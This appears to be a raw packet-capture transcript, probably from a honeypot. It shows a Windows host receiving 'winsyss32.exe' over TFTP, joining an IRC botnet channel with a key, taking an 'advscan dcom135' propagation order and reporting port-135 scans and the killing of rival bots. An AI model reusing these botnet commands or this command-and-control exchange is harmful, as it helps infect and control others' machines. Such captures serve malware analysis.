VICTIM: \000\001winsyss32.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: \000\004\000\177
VICTIM: \000\004\000\200
VICTIM: \000\004\000\201
VICTIM: \000\004\000\202
VICTIM: \000\004\000\203
VICTIM: \000\004\000\204
VICTIM: \000\004\000\205
VICTIM: \000\004\000\206
VICTIM: \000\004\000\207
VICTIM: \000\004\000\210
VICTIM: \000\004\000\211
VICTIM: \000\004\000\212
VICTIM: \000\004\000\213
VICTIM: \000\004\000\214
VICTIM: \000\004\000\215
VICTIM: \000\004\000\216
VICTIM: \000\004\000\217
VICTIM: \000\004\000\220
VICTIM: \000\004\000\221
VICTIM: \000\004\000\222
VICTIM: \000\004\000\223
VICTIM: \000\004\000\224
VICTIM: \000\004\000\225
VICTIM: \000\004\000\226
VICTIM: \000\004\000\227
VICTIM: \000\004\000\230
VICTIM: \000\004\000\231
VICTIM: \000\004\000\232
VICTIM: \000\004\000\233
VICTIM: \000\004\000\234
VICTIM: \000\004\000\235
VICTIM: \000\004\000\236
VICTIM: \000\004\000\237
VICTIM: \000\004\000\240
VICTIM: \000\004\000\241
VICTIM: \000\004\000\242
VICTIM: \000\004\000\243
VICTIM: \000\004\000\244
VICTIM: NICK USA|2K|SP2|466210USER vrwmwcqm 0 0 :USA|2K|SP2|466210
ATTACKER: :mail.dcc.kfupm.edu.sa NOTICE AUTH :*** Looking up your hostname...
ATTACKER: :mail.dcc.kfupm.edu.sa NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
ATTACKER: :mail.dcc.kfupm.edu.sa 001 USA|2K|SP2|466210 :Welcome to the a IRC Network USA|2K|SP2|466210!vrwmwcqm@192.168.1.177:mail.dcc.kfupm.edu.sa 002 USA|2K|SP2|466210 :Your host is mail.dcc.kfupm.edu.sa, running version Unreal3.2.7:mail.dcc.kfupm.edu.sa 003 USA|2K|SP2|466210 :This server was created Sun Dec 30 2007 at 03:29:39 AST:mail.dcc.kfupm.edu.sa 004 USA|2K|SP2|466210 mail.dcc.kfupm.edu.sa Unreal3.2.7 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj:mail.dcc.kfupm.edu.sa 005 USA|2K|SP2|466210 NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server:mail.dcc.kfupm.edu.sa 005 USA|2K|SP2|466210 WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=a CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server:mail.dcc.kfupm.edu.sa 005 USA|2K|SP2|466210 CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server:mail.dcc.kfupm.edu.sa 251 USA|2K|SP2|466210 :There are 1 users and 95 invisible on 1 servers:mail.dcc.kfupm.edu.sa 254 USA|2K|SP2|466210 8 :channels formed:mail.dcc.kfupm.edu.sa 255 USA|2K|SP2|466210 :I have 96 clients and 0 servers:mail.dcc.kfupm.edu.sa 265 USA|2K|SP2|466210 :Current Lo
ATTACKER: cal Users: 96 Max: 596:mail.dcc.kfupm.edu.sa 266 USA|2K|SP2|466210 :Current Global Users: 96 Max: 223:mail.dcc.kfupm.edu.sa 422 USA|2K|SP2|466210 :MOTD File is missing:USA|2K|SP2|466210 MODE USA|2K|SP2|466210 :+iwsx
VICTIM: USERHOST USA|2K|SP2|466210
ATTACKER: :mail.dcc.kfupm.edu.sa 302 USA|2K|SP2|466210 :USA|2K|SP2|466210=+vrwmwcqm@192.168.1.177
VICTIM: MODE USA|2K|SP2|466210 +iu-xJOIN ##nhg## NeoXBoTUSERHOST USA|2K|SP2|466210MODE USA|2K|SP2|466210 +iu-xJOIN ##nhg## NeoXBoTUSERHOST USA|2K|SP2|466210MODE USA|2K|SP2|466210 +iu-xJOIN ##nhg## NeoXBoTUSERHOST USA|2K|SP2|466210MODE USA|2K|SP2|466210 +iu-xJOIN ##nhg## NeoXBoT
ATTACKER: :mail.dcc.kfupm.edu.sa 501 USA|2K|SP2|466210 :Unknown MODE flag:USA|2K|SP2|466210 MODE USA|2K|SP2|466210 :-x:USA|2K|SP2|466210!vrwmwcqm@192.168.1.177 JOIN :##nhg##:mail.dcc.kfupm.edu.sa 332 USA|2K|SP2|466210 ##nhg## :#advscan dcom135 130 5 0 -r -a:mail.dcc.kfupm.edu.sa 333 USA|2K|SP2|466210 ##nhg## psychoz 1202080056:mail.dcc.kfupm.edu.sa 353 USA|2K|SP2|466210 @ ##nhg## :USA|2K|SP2|466210 :mail.dcc.kfupm.edu.sa 366 USA|2K|SP2|466210 ##nhg## :End of /NAMES list.:mail.dcc.kfupm.edu.sa 302 USA|2K|SP2|466210 :USA|2K|SP2|466210=+vrwmwcqm@192.168.1.177 :mail.dcc.kfupm.edu.sa 501 USA|2K|SP2|466210 :Unknown MODE flag:mail.dcc.kfupm.edu.sa 302 USA|2K|SP2|466210 :USA|2K|SP2|466210=+vrwmwcqm@192.168.1.177 :mail.dcc.kfupm.edu.sa 501 USA|2K|SP2|466210 :Unknown MODE flag
VICTIM: PRIVMSG ##nhg## :[SCAN]: Random Port Scan started on 10.x.x.x:135 with a delay of 5 seconds for 0 minutes using 130 threads.
ATTACKER: :mail.dcc.kfupm.edu.sa 302 USA|2K|SP2|466210 :USA|2K|SP2|466210=+vrwmwcqm@192.168.1.177
VICTIM: PRIVMSG ##exp1## :Bot killed and removed: C:\\WINNT\\System32\egsvc.exe (pid: 488)!
VICTIM: PRIVMSG ##exp1## :Bot killed and removed: C:\\WINNT\\System32\egsvc.exe (pid: 488)!PRIVMSG ##exp1## :Bot killed and removed: C:\\WINNT\\System32\\MSTask.exe (pid: 516)!
VICTIM: PRIVMSG ##exp1## :Bot killed and removed: C:\\WINNT\\System32\egsvc.exe (pid: 488)!PRIVMSG ##exp1## :Bot killed and removed: C:\\WINNT\\System32\\MSTask.exe (pid: 516)!
VICTIM: PRIVMSG ##exp1## :Bot killed and removed: C:\\WINNT\\System32\egsvc.exe (pid: 488)!PRIVMSG ##exp1## :Bot killed and removed: C:\\WINNT\\System32\\MSTask.exe (pid: 516)!
VICTIM: PRIVMSG ##exp1## :Bot killed and removed: C:\\WINNT\\System32\egsvc.exe (pid: 488)!PRIVMSG ##exp1## :Bot killed and removed: C:\\WINNT\\System32\\MSTask.exe (pid: 516)!
VICTIM: PRIVMSG ##exp1## :Bot killed and removed: C:\\WINNT\\System32\egsvc.exe (pid: 488)!PRIVMSG ##exp1## :Bot killed and removed: C:\\WINNT\\System32\\MSTask.exe (pid: 516)!
ATTACKER: NICK USA|2K|SP2|578158USER vvirjm 0 0 :USA|2K|SP2|578158
ATTACKER: :mail.dcc.kfupm.edu.sa NOTICE AUTH :*** Looking up your hostname...
ATTACKER: :mail.dcc.kfupm.edu.sa NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead:mail.dcc.kfupm.edu.sa 001 USA|2K|SP2|578158 :Welcome to the a IRC Network USA|2K|SP2|578158!vvirjm@192.168.1.177:mail.dcc.kfupm.edu.sa 002 USA|2K|SP2|578158 :Your host is mail.dcc.kfupm.edu.sa, running version Unreal3.2.7:mail.dcc.kfupm.edu.sa 003 USA|2K|SP2|578158 :This server was created Sun Dec 30 2007 at 03:29:39 AST:mail.dcc.kfupm.edu.sa 004 USA|2K|SP2|578158 mail.dcc.kfupm.edu.sa Unreal3.2.7 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj:mail.dcc.kfupm.edu.sa 005 USA|2K|SP2|578158 NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server:mail.dcc.kfupm.edu.sa 005 USA|2K|SP2|578158 WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=a CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server:mail.dcc.kfupm.edu.sa 005 USA|2K|SP2|578158 CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server:mail.dcc.kfupm.edu.sa 251 USA|2K|SP2|578158 :There are 1 users and 98 invisible on 1 servers:mail.dcc.kfupm.edu.sa 254 USA|2K|SP2|578158 8 :channels formed:mail.dcc.kfupm.edu.sa 255 USA|2K|
ATTACKER: SP2|578158 :I have 99 clients and 0 servers:mail.dcc.kfupm.edu.sa 265 USA|2K|SP2|578158 :Current Local Users: 99 Max: 596:mail.dcc.kfupm.edu.sa 266 USA|2K|SP2|578158 :Current Global Users: 99 Max: 223:mail.dcc.kfupm.edu.sa 422 USA|2K|SP2|578158 :MOTD File is missing:USA|2K|SP2|578158 MODE USA|2K|SP2|578158 :+iwsx
VICTIM: USERHOST USA|2K|SP2|578158
ATTACKER: :mail.dcc.kfupm.edu.sa 302 USA|2K|SP2|578158 :USA|2K|SP2|578158=+vvirjm@192.168.1.177
VICTIM: MODE USA|2K|SP2|578158 +iu-xJOIN ##nhg## NeoXBoTUSERHOST USA|2K|SP2|578158MODE USA|2K|SP2|578158 +iu-xJOIN ##nhg## NeoXBoTUSERHOST USA|2K|SP2|578158MODE USA|2K|SP2|578158 +iu-xJOIN ##nhg## NeoXBoTUSERHOST USA|2K|SP2|578158MODE USA|2K|SP2|578158 +iu-xJOIN ##nhg## NeoXBoT
ATTACKER: :mail.dcc.kfupm.edu.sa 501 USA|2K|SP2|578158 :Unknown MODE flag:USA|2K|SP2|578158 MODE USA|2K|SP2|578158 :-x:USA|2K|SP2|578158!vvirjm@192.168.1.177 JOIN :##nhg##:mail.dcc.kfupm.edu.sa 332 USA|2K|SP2|578158 ##nhg## :#advscan dcom135 130 5 0 -r -a:mail.dcc.kfupm.edu.sa 333 USA|2K|SP2|578158 ##nhg## psychoz 1202080056:mail.dcc.kfupm.edu.sa 353 USA|2K|SP2|578158 @ ##nhg## :USA|2K|SP2|578158 :mail.dcc.kfupm.edu.sa 366 USA|2K|SP2|578158 ##nhg## :End of /NAMES list.:mail.dcc.kfupm.edu.sa 302 USA|2K|SP2|578158 :USA|2K|SP2|578158=+vvirjm@192.168.1.177 :mail.dcc.kfupm.edu.sa 501 USA|2K|SP2|578158 :Unknown MODE flag:mail.dcc.kfupm.edu.sa 302 USA|2K|SP2|578158 :USA|2K|SP2|578158=+vvirjm@192.168.1.177 :mail.dcc.kfupm.edu.sa 501 USA|2K|SP2|578158 :Unknown MODE flag
VICTIM: PRIVMSG ##nhg## :[SCAN]: Already 131 scanning threads. Too many specified.
ATTACKER: :mail.dcc.kfupm.edu.sa 302 USA|2K|SP2|578158 :USA|2K|SP2|578158=+vvirjm@192.168.1.177
ATTACKER: :mail.dcc.kfupm.edu.sa 501 USA|2K|SP2|578158 :Unknown MODE flag
ATTACKER: :mail.dcc.kfupm.edu.sa 404 USA|2K|SP2|578158 ##nhg## :You must have a registered nick (+r) to talk on this channel (##nhg##)
ATTACKER: NICK jxqitfgiUSER h020500 . . :-
VICTIM: Service Pack 2JOIN &virtu